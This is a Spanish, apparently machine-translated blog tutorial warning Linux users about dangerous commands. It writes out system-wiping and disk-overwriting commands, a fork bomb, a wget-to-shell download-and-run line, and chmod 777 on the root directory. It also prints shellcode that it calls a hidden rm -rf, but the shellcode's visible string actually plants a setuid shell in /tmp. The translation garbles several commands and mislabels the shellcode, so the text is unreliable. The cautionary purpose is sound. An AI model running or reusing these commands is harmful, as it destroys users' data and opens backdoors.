Tutoriales

Comandos más peligrosos: no debe ejecutarlos en Linux

La interfaz de línea de comandos es una utilidad poderosa y conveniente para administrar sistemas Linux. Proporciona una forma rápida y versátil de ejecutar un sistema, especialmente cuando se administran sistemas sin interfaz gráfica.

Si bien es útil en la gestión de sistemas, la línea de comandos está plagada de riesgos. Ejecutar el comando incorrecto puede causar daños irreversibles a su sistema. En esta guía, hemos reunido una lista de algunos de los comandos más riesgosos que no debería considerar ejecutar en su sistema.

1. rm -rf /comando

Este comando rm es un comando de Linux para eliminar archivos y directorios en función de los parámetros utilizados.Sin embargo, debe usarse con extremo cuidado. RM El comando como un pequeño error tipográfico o error puede causar daños irreparables en el sistema.

cuando se ejecuta como root -rf / opción, el comando elimina todos los archivos y directorios en el sistema recursivamente a partir del directorio raíz (/) Este es el más alto en la estructura de jerarquía de archivos de Linux. en breve, rm -rf / El comando borra completamente su sistema, causando que se corrompa e irrecuperable.

y comando rm Sí.

  • RM Los comandos en Linux se utilizan para eliminar archivos.
  • rm-r El comando elimina carpetas de forma recursiva, incluso carpetas vacías.
  • rm-f Comando para eliminar «archivos de solo lectura» sin preguntar.
  • rm -rf / : Forzar la eliminación de todo en el directorio raíz.
  • rm -rf * : Fuerza la eliminación de todo en el directorio actual/directorio de trabajo.
  • rm-rf. : Fuerza la eliminación de la carpeta y subcarpetas actuales.

De hecho, cuando ejecuta el comando como un usuario normal, recibirá dos advertencias en la terminal.

Ejemplo de comando rm de Linux

Supere el problema de eliminar archivos accidentalmente con ‘RM‘ comando, crea un alias ‘RM’ el comando es ‘rm-yo’ en el interior «.bashrc» archivo, le pedirá que confirme la eliminación cada vez.

2. :(){:|:&};: comando

La parte superior es en realidad una bomba de horquilla.Lo hace creando un ':', que se autodenomina dos veces, una en primer plano y otra en segundo plano. La ejecución repetida de esta función consume todos los recursos del sistema y hace que el sistema se bloquee.

De hecho, el comando de bomba de horquilla es esencialmente una forma de ataque DoS (denegación de servicio). También se conoce como el virus Wabbit o Rabbit. Lo peor de todo es que no necesita ser root para lanzar este ataque.

Afortunadamente, puede hacer esto limitando la cantidad de procesos que el usuario local puede ejecutar a aprox. 4000.

Puede hacer esto ejecutando el siguiente comando:

$ ulimit -S -u 4000

Puedes verificar esto más tarde con:

$ ulimit -u
Aumentar el límite de archivos abiertos en Linux
Aumentar el límite de archivos abiertos en Linux

3. Comando > /dev/sda

ejecuta el comando, luego >/dev/sda cubrir /dev/sda bloques en su disco duro. Este bloque contiene datos del sistema de archivos y, cuando se sobrescribe, puede causar que el sistema se dañe sin posibilidad de recuperación.

4. carpeta mv /dev/null

Otra acción dañina que no debe intentar es mover un directorio o archivo a /dev/null. Este /dev/null Un archivo es un tipo especial de archivo llamado dispositivo vacío o «agujero negro«. Cualquier movimiento a /dev/null desechado y destruido.

El siguiente comando moverá todo el contenido del directorio de inicio del usuario a /dev/nulldescartando así todos los datos contenidos en el directorio de inicio del usuario

# mv /home/user/* /dev/null

5. wget -O- |shh

El comando wget es un comando para descargar archivos desde un servidor web o de archivos. El comando anterior descarga un script de una fuente maliciosa y luego lo ejecuta.

6. mkfs.ext3 /dev/sda

Este mkfs El comando crea un nuevo sistema de archivos (ext2, ext3, ext4, etc.) en un dispositivo de almacenamiento formateado, que en la mayoría de los casos es una partición de un disco duro.correr mkfs Los comandos en la partición borran todos los datos almacenados en ella.

Si bien es útil al formatear particiones de disco, formatear una unidad completa (p. mkfs.ext3 /dev/sda) para bloquear el sistema y dejarlo en un estado irrecuperable. Esto sucede porque destruye todos los archivos del sistema, así como sus datos personales.

El comando también puede tomar otras formas, como se muestra a continuación.

# mkfs.ext4 /dev/sda
# mkfs.xfs /dev/sda
# mkfs.btrfs /dev/sda

7. > Comandos de archivo

Este > file borra el contenido del archivo y lo deja vacío.es sinonimo gato /dev/null > archivo Ordenar. Por lo tanto, se debe tener cuidado al usar operadores de redirección en sistemas Linux.

A continuación se muestra una demostración de cómo el comando sobrescribe un archivo de texto. Cuando los archivos involucrados son archivos de configuración, puede imaginar el desastre que causará este comando.

Ejemplo de comando de operador de redirección
Ejemplo de comando de operador de redirección

8. ^foo^bar

Este ^foo^bar El peligro y la utilidad del comando depende de cómo se ejecute. Si bien le permite editar comandos ejecutados previamente y ejecutarlos nuevamente, sería desastroso si no estuviera interesado en los cambios que realizó en el comando antes de ejecutarlo.

9. dd si=/dev/aleatorio de=/dev/sda

El comando anterior borra /dev/sda bloquear y escribir datos basura aleatorios en el bloque. Su sistema estará en una etapa inconsistente e irrecuperable.

10. chmod -R 777 /

Si bien es posible que no bloquee su sistema Linux de inmediato, chmod -R 777 / El comando asigna recursivamente todos los permisos (lectura, escritura y ejecución) a todos los archivos en un sistema Linux a partir del directorio raíz.

Esto expone efectivamente todos los archivos de configuración críticos y otros archivos a todos los usuarios, lo que representa un gran riesgo de seguridad para su sistema. Cualquier persona con malas intenciones puede modificar archivos críticos y comprometer fácilmente su sistema.

11. Comandos ocultos

El siguiente comando no es más que el primer comando anterior (rm -rf)Aquí el código está oculto en hexadecimal, por lo que podría engañar a los usuarios ignorantes. Ejecutar el siguiente código en su terminal borrará su partición raíz.

Este comando aquí muestra que las amenazas pueden estar ocultas y, a veces, a menudo indetectables. Tienes que saber lo que estás haciendo y cuáles serán los resultados. No compile ni ejecute código de fuentes desconocidas.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

notas: no ejecute ninguno de los comandos anteriores en su programa linux Terminal o shell o en la computadora de tu amigo o de la escuela. Si desea probarlos, ejecútelos en una máquina virtual.

Cualquier inconsistencia o pérdida de datos debido a la ejecución del comando anterior bloqueará su sistema, ya sea autor el articulo tampoco Tekmin Responsable.

Eso es todo hasta ahora. Volveré pronto con otro artículo interesante que a la gente le encantará leer.Hasta entonces, estad atentos y conectados a Tekmin.

Si conoces otros similares Comandos peligrosos de Linux Y desea que los agreguemos a la lista, háganoslo saber a través de la sección de comentarios y no olvide proporcionar sus valiosos comentarios.

Si aprecia lo que estamos haciendo en TecMint, debe considerar:

TecMint es el sitio comunitario de más rápido crecimiento y más confiable para artículos, guías y libros de Linux de cualquier tipo en la web. ¡Millones de personas visitan TecMint! Busque o explore miles de artículos publicados que están disponibles gratuitamente para todos.

Si le gusta lo que está leyendo, considere invitarnos a un café (o dos) como agradecimiento.

Apoyanos

Agradecemos su apoyo interminable.

LEER  Linux iotop comprueba qué está estresando y aumentando la carga en el disco duro

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba